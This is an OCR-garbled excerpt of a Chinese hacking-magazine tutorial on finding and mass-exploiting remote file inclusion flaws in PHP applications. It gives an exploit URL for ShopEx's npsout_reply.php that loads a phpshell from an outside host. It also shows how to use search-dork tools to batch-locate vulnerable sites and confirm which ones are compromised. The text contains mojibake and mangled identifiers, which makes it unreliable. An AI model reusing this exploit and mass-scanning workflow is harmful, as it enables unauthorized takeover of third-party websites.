如发现有乱码，请点击下面链接浏览原文
正文摘录:

盆强揽鳐越鳍瑚鹣纽鞠垂蠹谣菇j篓籀标题上wAnewsletter<‘2.1.3是指漏洞影响的版本.内容第一行说明newsletter.php文件存在远程文件包含漏洞，第2，3行依次是发现者、PHP程序的下载地址，我们注意的是最后一行，它指出了远程文件包含漏洞代码require.once(Swar-oot.‘star-t.phP’】；。我们将压缩包程序下载到本地，解压后的文件夹是newslettez’。打开x—code工具，点击“Browse”.选定liewsletter目录，再点击“确定”，程序就会自动对newsle¨er目录扫描是否存在远程文件包含漏洞了!很快的，不到一分钟就找到漏洞了，与上边漏洞公告的内容相同吧.而且还发现其它地方也存在远程叉子们使用这个小工具可以做很多事的，比如从网上下载一些php源代码来检查是否存在漏洞等，远程文件包含漏洞在国外可是被黑客玩得很火哟!接下来就开始我们的漏洞利用之旅!第三部分：疯狂的Phpshell找到了某个PHP程序的RFI漏洞，获取phpshell自然就不在话下了。我们以工具G0o小跑堂、Go0清扫员来演示SHOPEx的RFI漏洞批量利用。漏洞的文件是npsout.reply.php，主要是INC—SYsFIOMEDIR变量没有过滤而造成的。Goo小跑堂的功能是替换URL参数，打开Goo小跑堂，点击“高级搜索”，关键字处可以填写”，产品目录联系我们关于我们常见问题安全交易购买流程如何付款””，搜索结果设置为l00.并在程序界面的“关键：”处填反斜杆“／”，因为程序将定位根目录来替换。另外就是在程序最左下角打勾，输入漏洞文件的利用，即构造提交参数shop／npsout—r~ply.php?lNC—SYSHOMEDIR=http；／／xhonker‘.com／lizaib.txt?，G00小跑堂将根据搜索结果补充完整参数。好了，现在点击网页里的“Google搜索”，看，好多结果飞出来了，如图3。这么多的结果，到底哪些存在漏洞呢?我们可以使用Goo清扫员自动帮我们验证，选中所有URL并复制到G0o清扫员的分析框下，并点击“添加到列表”，这时所有网址都添加到检测处了。因为验证是需要关键字识别的，我们再把“需要关键字”勾选上，我输入的是“lizaib99”，验证的phpshell中有这一段文字，是我故意加上去的，以便于识别。然后点击“开始”，一瓶可乐的工夫(叉子：这个时间是多长?)，扫描结果出来了，如图4。图3圈4我们打开第一个看看，不错吧，不到一分钟就出现phpshell了，如图5。图5再告诉叉子们一些小技巧，G00小跑堂搜索的范围越多越好，G0o清扫员的关键字使用中文与字母加数字验证更准确，你只要将PHPshell的一段文字改为“黑客X档案”与“lizaib99”等就行了。现在再来介绍一个小工具一RFI扫描者。这是